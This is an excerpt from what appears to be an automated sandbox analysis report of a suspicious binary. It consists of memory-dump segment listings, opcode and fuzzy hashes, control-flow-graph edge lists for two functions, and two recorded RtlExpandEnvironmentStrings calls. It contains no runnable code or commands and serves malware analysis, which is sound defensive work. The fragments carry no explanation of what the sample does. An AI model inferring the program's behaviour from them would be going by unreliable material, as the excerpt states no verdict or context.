                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                                                                                                                                                              • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                                                                                                                                                              • API String ID: 1773362589-1335595022
                                                                                                                                                                                                                              • Opcode ID: 290b8c453a24dd0017929efbcd19ddc6f806721d35ee47e2ac662a68e7f415c5
                                                                                                                                                                                                                              • Instruction ID: 7160ee7f0d616b43f99cb261d9bd13e4c0de336a86108392fc9b6459638911ab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 290b8c453a24dd0017929efbcd19ddc6f806721d35ee47e2ac662a68e7f415c5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC221476A083419BE311CF28C881B5BBBE2EFC5314F18892CE5D89B392D775D945CB82
                                                                                                                                                                                                                              Function 00FF39B9 Relevance: 14.8, APIs: 2, Strings: 6, Instructions: 822COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1364 ff39b9-ff39ce 1365 ff39ef-ff39ff 1364->1365 1366 ff374a-ff375f 1364->1366 1367 ff3a37-ff3a51 1364->1367 1368 ff3a06-ff3a14 1364->1368 1369 ff3a22-ff3a30 1364->1369 1370 ff3990-ff399c 1364->1370 1371 ff39e0-ff39e8 1364->1371 1372 ff3a20 1364->1372 1365->1366 1365->1367 1365->1368 1365->1369 1365->1371 1365->1372 1374 ff392c-ff3940 1366->1374 1375 ff396a-ff3979 1366->1375 1376 ff3919-ff3925 1366->1376 1377 ff3785-ff37ad 1366->1377 1378 ff37b4-ff37bc 1366->1378 1379 ff37c4-ff37cc 1366->1379 1380 ff37f2-ff37f9 1366->1380 1381 ff37e0-ff37ef 1366->1381 1382 ff3770-ff377e 1366->1382 1367->1365 1367->1366 1367->1367 1367->1368 1367->1369 1367->1370 1367->1371 1367->1372 1373 ff3a58-ff3a5f 1367->1373 1368->1372 1369->1366 1369->1367 1369->1371 1370->1364 1371->1365 1371->1366 1371->1367 1371->1368 1371->1369 1371->1370 1371->1371 1371->1372 1385 ff3a68-ff3a72 1373->1385 1374->1373 1374->1375 1384 ff3ccb-ff3cd5 call fd7f60 1374->1384 1374->1385 1386 ff3cd8-ff3ce1 1374->1386 1387 ff3a77-ff3a8a 1374->1387 1388 ff3c85-ff3c8c 1374->1388 1389 ff3cc3 1374->1389 1390 ff3ce2-ff3ce9 1374->1390 1391 ff3950-ff3963 1374->1391 1392 ff3980 1374->1392 1393 ff3b50-ff3bd2 1374->1393 1375->1373 1375->1384 1375->1385 1375->1386 1375->1387 1375->1388 1375->1389 1375->1390 1375->1392 1375->1393 1376->1374 1376->1375 1376->1378 1376->1379 1376->1380 1376->1381 1377->1378 1377->1379 1377->1380 1377->1381 1378->1379 1379->1381 1380->1382 1394 ff384e-ff385b 1380->1394 1395 ff3800-ff3834 1380->1395 1396 ff38c0-ff38c5 1380->1396 1397 ff38d0 1380->1397 1398 ff3840-ff3842 1380->1398 1381->1380 1382->1374 1382->1375 1382->1376 1382->1377 1382->1378 1382->1379 1382->1380 1382->1381 1384->1386 1414 ff3406-ff3412 1385->1414 1387->1414 1401 ff3c8e-ff3c93 1388->1401 1402 ff3c95 1388->1402 1389->1384 1404 ff3ceb-ff3cf0 1390->1404 1405 ff3cf2 1390->1405 1391->1373 1391->1375 1391->1384 1391->1385 1391->1386 1391->1387 1391->1388 1391->1389 1391->1390 1391->1392 1391->1393 1392->1370 1400 ff3be0-ff3c0c 1393->1400 1399 ff3860-ff387a 1394->1399 1395->1398 1396->1397 1397->1376 1398->1394 1399->1399 1408 ff387c-ff3883 1399->1408 1400->1400 1410 ff3c0e-ff3c4f RtlExpandEnvironmentStrings 1400->1410 1409 ff3c98-ff3cbc call fd7f50 RtlExpandEnvironmentStrings 1401->1409 1402->1409 1412 ff3cf9-ff3d2f call fd7f50 1404->1412 1405->1412 1408->1382 1415 ff3889-ff3898 1408->1415 1409->1384 1409->1386 1409->1389 1409->1390 1426 ff3dfe-ff3e03 1409->1426 1427 ff3e0c-ff3e16 1409->1427 1428 ff3f9a-ff4035 1409->1428 1429 ff3f79 1409->1429 1430 ff3f69-ff3f71 1409->1430 1416 ff3c50-ff3c73 1410->1416 1423 ff3d30-ff3d83 1412->1423 1420 ff38a0-ff38a7 1415->1420 1416->1416 1421 ff3c75-ff3c7e 1416->1421 1424 ff38a9-ff38ac 1420->1424 1425 ff38d2-ff38d8 1420->1425 1421->1384 1421->1386 1421->1388 1421->1389 1421->1390 1421->1426 1421->1427 1421->1428 1421->1429 1421->1430 1423->1423 1431 ff3d85-ff3d8e 1423->1431 1424->1420 1436 ff38ae 1424->1436 1425->1382 1432 ff38de-ff38fc call 100e110 1425->1432 1426->1427 1434 ff3e1f 1427->1434 1435 ff3e18-ff3e1d 1427->1435 1433 ff4040-ff40ce 1428->1433 1437 ff3f7f-ff3f8b call fd7f60 1429->1437 1430->1429 1438 ff3db1-ff3dc5 1431->1438 1439 ff3d90-ff3d96 1431->1439 1447 ff3901-ff3912 1432->1447 1433->1433 1441 ff40d4-ff40ea call ff1d00 1433->1441 1442 ff3e26-ff3eba call fd7f50 1434->1442 1435->1442 1436->1382 1457 ff3f94 1437->1457 1445 ff3dc7-ff3dca 1438->1445 1446 ff3de1-ff3dea call 10114b0 1438->1446 1444 ff3da0-ff3daf 1439->1444 1458 ff40f3-ff410f 1441->1458 1456 ff3ec0-ff3ee5 1442->1456 1444->1438 1444->1444 1451 ff3dd0-ff3ddf 1445->1451 1455 ff3def-ff3df7 1446->1455 1447->1374 1447->1375 1447->1376 1447->1377 1447->1378 1447->1379 1447->1380 1447->1381 1451->1446 1451->1451 1455->1426 1455->1427 1455->1428 1455->1429 1455->1430 1455->1437 1455->1458 1456->1456 1459 ff3ee7-ff3ef0 1456->1459 1457->1428 1460 ff4110-ff415b 1458->1460 1461 ff3ef2-ff3efa 1459->1461 1462 ff3f11-ff3f1f 1459->1462 1460->1460 1463 ff415d-ff41ce 1460->1463 1464 ff3f00-ff3f0f 1461->1464 1465 ff3f41-ff3f62 call 10114b0 1462->1465 1466 ff3f21-ff3f24 1462->1466 1467 ff41d0-ff427b 1463->1467 1464->1462 1464->1464 1465->1384 1465->1386 1465->1429 1465->1430 1465->1437 1465->1457 1465->1458 1475 ff42ad-ff42b9 call fd7f60 1465->1475 1476 ff42a7 1465->1476 1468 ff3f30-ff3f3f 1466->1468 1467->1467 1469 ff4281-ff429e call ff1b60 1467->1469 1468->1465 1468->1468 1469->1476 1479 ff42bc 1475->1479 1476->1475 1479->1479
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: #E#G$+A#C$=]=_$_^]\$eN$rp
                                                                                                                                                                                                                              • API String ID: 0-3333364358
                                                                                                                                                                                                                              • Opcode ID: 9c2bd8961962bb158e26d2e0764e705959ddfc05c03aeb8f47cefe37e2aecbf8
                                                                                                                                                                                                                              • Instruction ID: 6c051d9c355e12cfb56d56f4a504d2746b79a205658f31e87cb1244e6f728e5f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c2bd8961962bb158e26d2e0764e705959ddfc05c03aeb8f47cefe37e2aecbf8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 714249B1A04205CFD724CF68C8916AABBB2FF89310F1982ACD5859F395D779D942CBD0
                                                                                                                                                                                                                              Function 00FF3B50 Relevance: 12.8, APIs: 2, Strings: 5, Instructions: 600COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1480 ff3b50-ff3bd2 1481 ff3be0-ff3c0c 1480->1481 1481->1481 1482 ff3c0e-ff3c4f RtlExpandEnvironmentStrings 1481->1482 1483 ff3c50-ff3c73 1482->1483 1483->1483 1484 ff3c75-ff3c7e 1483->1484 1485 ff3dfe-ff3e03 1484->1485 1486 ff3e0c-ff3e16 1484->1486 1487 ff3ccb-ff3cd5 call fd7f60 1484->1487 1488 ff3f9a-ff4035 1484->1488 1489 ff3f79 1484->1489 1490 ff3f69-ff3f71 1484->1490 1491 ff3cd8-ff3ce1 1484->1491 1492 ff3c85-ff3c8c 1484->1492 1493 ff3cc3 1484->1493 1494 ff3ce2-ff3ce9 1484->1494 1485->1486 1501 ff3e1f 1486->1501 1502 ff3e18-ff3e1d 1486->1502 1487->1491 1498 ff4040-ff40ce 1488->1498 1503 ff3f7f-ff3f8b call fd7f60 1489->1503 1490->1489 1495 ff3c8e-ff3c93 1492->1495 1496 ff3c95 1492->1496 1493->1487 1499 ff3ceb-ff3cf0 1494->1499 1500 ff3cf2 1494->1500 1504 ff3c98-ff3cbc call fd7f50 RtlExpandEnvironmentStrings 1495->1504 1496->1504 1498->1498 1507 ff40d4-ff40ea call ff1d00 1498->1507 1505 ff3cf9-ff3d2f call fd7f50 1499->1505 1500->1505 1508 ff3e26-ff3eba call fd7f50 1501->1508 1502->1508 1523 ff3f94 1503->1523 1504->1485 1504->1486 1504->1487 1504->1488 1504->1489 1504->1490 1504->1491 1504->1493 1504->1494 1519 ff3d30-ff3d83 1505->1519 1524 ff40f3-ff410f 1507->1524 1520 ff3ec0-ff3ee5 1508->1520 1519->1519 1521 ff3d85-ff3d8e 1519->1521 1520->1520 1522 ff3ee7-ff3ef0 1520->1522 1525 ff3db1-ff3dc5 1521->1525 1526 ff3d90-ff3d96 1521->1526 1527 ff3ef2-ff3efa 1522->1527 1528 ff3f11-ff3f1f 1522->1528 1523->1488 1529 ff4110-ff415b 1524->1529 1533 ff3dc7-ff3dca 1525->1533 1534 ff3de1-ff3dea call 10114b0 1525->1534 1531 ff3da0-ff3daf 1526->1531 1532 ff3f00-ff3f0f 1527->1532 1535 ff3f41-ff3f62 call 10114b0 1528->1535 1536 ff3f21-ff3f24 1528->1536 1529->1529 1530 ff415d-ff41ce 1529->1530 1537 ff41d0-ff427b 1530->1537 1531->1525 1531->1531 1532->1528 1532->1532 1538 ff3dd0-ff3ddf 1533->1538 1542 ff3def-ff3df7 1534->1542 1535->1487 1535->1489 1535->1490 1535->1491 1535->1503 1535->1523 1535->1524 1548 ff42ad-ff42b9 call fd7f60 1535->1548 1549 ff42a7 1535->1549 1539 ff3f30-ff3f3f 1536->1539 1537->1537 1541 ff4281-ff429e call ff1b60 1537->1541 1538->1534 1538->1538 1539->1535 1539->1539 1541->1549 1542->1485 1542->1486 1542->1488 1542->1489 1542->1490 1542->1503 1542->1524 1552 ff42bc 1548->1552 1549->1548 1552->1552
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00FF3C37
                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00FF3CB1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID: #E#G$+A#C$=]=_$eN$rp
